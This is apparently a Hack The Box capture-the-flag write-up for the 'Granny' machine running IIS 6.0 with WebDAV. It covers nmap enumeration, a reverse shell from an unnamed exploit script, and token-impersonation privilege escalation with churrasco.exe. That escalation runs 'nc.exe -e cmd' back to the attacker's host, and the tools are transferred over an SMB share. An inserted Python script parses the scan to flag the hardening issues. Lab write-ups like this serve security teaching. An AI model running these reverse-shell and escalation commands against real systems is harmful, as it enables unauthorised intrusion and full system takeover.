Granny HTB
IP
10.10.10.15
Initial nmap scan (the grep keeps only the port lines so the cut/tr pipeline yields a clean comma-separated port list)
sudo nmap -p- --min-rate 10000 10.10.10.15 | grep '^[0-9]' | cut -d"/" -f1 | tr '\n' ','
Looks like we have one port open on the machine
80
Let's enumerate further and see if we can find any other details
sudo nmap -sCV -p80 -oA nmap_scan 10.10.10.15
results
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan:
| Server Type: Microsoft-IIS/6.0
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| Server Date: Tue, 02 Jan 2024 02:37:59 GMT
| WebDAV type: Unknown
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
We can see:
Running Microsoft IIS httpd 6.0 (pretty outdated)
WebDAV is enabled
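The two observations above (unsupported IIS version, WebDAV write methods advertised) are exactly what a hardening review should pull out of a scan like this. The following is an added example, not part of the original writeup or of nmap: it parses the nmap http-* script output quoted above (embedded as constructed sample input) and turns it into a short list of findings. The method set and the version threshold are my own assumptions about what counts as a finding.

```python
import re

# Constructed sample input: the nmap -sCV script output shown above, embedded so this runs offline.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan:
| Server Type: Microsoft-IIS/6.0
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| Server Date: Tue, 02 Jan 2024 02:37:59 GMT
| WebDAV type: Unknown
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
"""

# Assumption: methods that let a client create, change, relocate or remove server content.
# On an internet-facing host these should be off unless WebDAV authoring is intentionally
# exposed behind authentication.
WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}


def _method_list(value):
    """Split 'A, B, C' or 'A B C' into an uppercase list of method names."""
    return [m.upper() for m in re.split(r"[,\s]+", value.strip()) if m]


def parse_nmap_http(output):
    """Extract the server header and advertised method lists from nmap's http-* script output."""
    info = {"server_header": "", "allowed": [], "public": [], "risky": []}
    for raw in output.splitlines():
        line = raw.lstrip("|_ ").strip()  # drop nmap's script-output prefix characters
        if ":" not in line:
            continue
        key, value = (part.strip() for part in line.split(":", 1))
        if key == "http-server-header":
            info["server_header"] = value
        elif key == "Allowed Methods":
            info["allowed"] = _method_list(value)
        elif key == "Public Options":
            info["public"] = _method_list(value)
        elif key == "Potentially risky methods":
            info["risky"] = _method_list(value)
    return info


def iis_major_version(server_header):
    """Return the IIS major version from a 'Microsoft-IIS/x.y' header, or None if not IIS."""
    m = re.match(r"Microsoft-IIS/(\d+)", server_header)
    return int(m.group(1)) if m else None


def assess(info):
    """Turn the parsed scan data into a list of hardening findings (strings)."""
    findings = []
    major = iis_major_version(info["server_header"])
    # IIS 6.0 shipped with Windows Server 2003, whose extended support ended in July 2015;
    # anything at or below that level is unsupported and no longer receives patches.
    if major is not None and major <= 6:
        findings.append(f"unsupported web server: {info['server_header']}")
    # Union of both advertised lists: PUT appears only under Public Options in this scan.
    advertised = set(info["allowed"]) | set(info["public"])
    exposed_writes = sorted(advertised & WRITE_METHODS)
    if exposed_writes:
        findings.append("WebDAV write methods exposed: " + ", ".join(exposed_writes))
    if "TRACE" in advertised:
        findings.append("TRACE enabled (disable to prevent cross-site tracing)")
    return findings


if __name__ == "__main__":
    for finding in assess(parse_nmap_http(NMAP_OUTPUT)):
        print("-", finding)
```

Note that the two method lists nmap reports differ: PUT shows up only under Public Options, which is why the assessment unions them before checking against the write set.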
This looks very similar to the Grandpa box we solved recently, meaning I can try the same exploit and gain a shell on the system.
Let's start a listener
rlwrap -cAr nc -lvnp 9001
Let's run the exploit script
python2 exploit.py 10.10.10.15 80 10.10.14.2 9001
Looking back at our listener we can see we have a shell on the target

Since we know that the Grandpa box was vulnerable to token manipulation, there is a good chance we have the same scenario here. Let's check:
whoami /all

Looks like it, so let's upload:
nc.exe
churrasco.exe
Start an SMB server and transfer the files across
sudo python2 /opt/impacket-0.9.19/examples/smbserver.py shrek123 ./ -smb2support
Copy the files across to the target machine
C:\>copy \\10.10.14.2\shrek123\nc.exe C:\wmpub
C:\>copy \\10.10.14.2\shrek123\churrasco.exe C:\wmpub
Start a listener
nc -lvnp 9005
Run the exploit
churrasco.exe -d "c:\wmpub\nc.exe -e cmd 10.10.14.2 9005"
Now if we look back at our listener we should see we have a shell as nt authority\system
